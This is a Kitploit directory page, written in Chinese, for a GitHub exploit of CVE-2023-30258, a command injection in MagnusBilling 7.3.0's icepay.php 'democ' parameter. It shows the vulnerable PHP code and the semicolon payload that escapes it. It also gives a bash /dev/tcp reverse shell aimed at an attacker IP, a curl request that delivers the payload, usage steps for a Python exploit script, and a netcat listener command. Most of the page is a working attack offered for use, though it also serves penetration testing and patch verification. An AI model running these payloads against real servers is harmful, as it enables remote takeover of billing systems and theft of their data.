Skip to content
KitploitKITPLOIT
工具博客
Log in
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
magnus_billing_7.3.0_RCE_CVE-2023-30258 — 针对 CVE-2023-30258 的漏洞利用:MagnusBilling 7.3.0 中通过 icepay.php 中未净化的 'democ' 参数实现远程代码执行,导致命令注入和反向 shell。 | Kitploit
工具/GitHubGitHub/kayl22/magnus_billing_7.3.0_rce_cve-2023-30258
Payload生成漏洞利用Web应用程序漏洞利用渗透测试命令与控制远程访问工具
GitHubkayl22/magnus_billing_7.3.0_rce_cve-2023-30258

magnus_billing_7.3.0_RCE_CVE-2023-30258

针对 CVE-2023-30258 的漏洞利用:MagnusBilling 7.3.0 中通过 icepay.php 中未净化的 'democ' 参数实现远程代码执行,导致命令注入和反向 shell。

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享
查看仓库
129个月前尚未审核

magnus_billing_7.3.0_RCE_CVE-2023-30258

在 magnus billing 7.3.0 中存在一个远程代码执行漏洞,位于 "icepay.php" 资源的 "democ" 参数中,你可以绕过查询并执行任意命令。

漏洞代码

if (isset($_GET['democ'])) {
    if (strlen($_GET['democ']) > 5) {
        exec("touch " . $_GET['democ'] . '.txt');
    } else {
        exec("rm -rf *.txt");
    }
}

"democ" 参数被传递给 exec() 来创建新文件,但正如你所见,没有任何字符串清理,攻击者可以轻松转义 touch 命令并执行任意命令,甚至获得反向 shell。为了绕过 .txt 扩展名,我们只需在字符串末尾添加另一个 ";"。最终的 payload 如下:

testfile;<command>;testfile

这是它传递给 exec() 函数时的样子:

exec('touch testfile;<command>;testfile.txt');

例如,反向 shell:

exec('touch testfile; bash -c "bash -i >& /dev/tcp/<ip>/<port> 0>&1";testfile.txt')

利用 >:D

我们可以使用 curl 来获得一个反向 shell,例如:

curl -X GET http://127.0.0.1:8080/lib/icepay/icepay.php?democ=testfile;<urlencoded_payload>;testfile

或者如果你愿意,可以使用此仓库中的 Python 脚本。安装:

git clone https://github.com/kayl22/magnus_billing_7.3.0_RCE_CVE-2023-30258 # 获取仓库

cd ./magnus_billing_7.3.0_RCE_CVE-2023-30258                                # 切换目录

chmod +x ./magnusbilling_rce.py                                             # 添加执行权限

用法:

./magnusbilling_rce.py -h                                                   # 显示帮助

./magnusbilling_rce.py -lh <攻击者IP> -lp <本地端口> -u http://<IP/域名>:<端口>/

最后但同样重要的是,记得使用 netcat 启动一个监听器:

nc -nlvvp <本地端口>
下载工具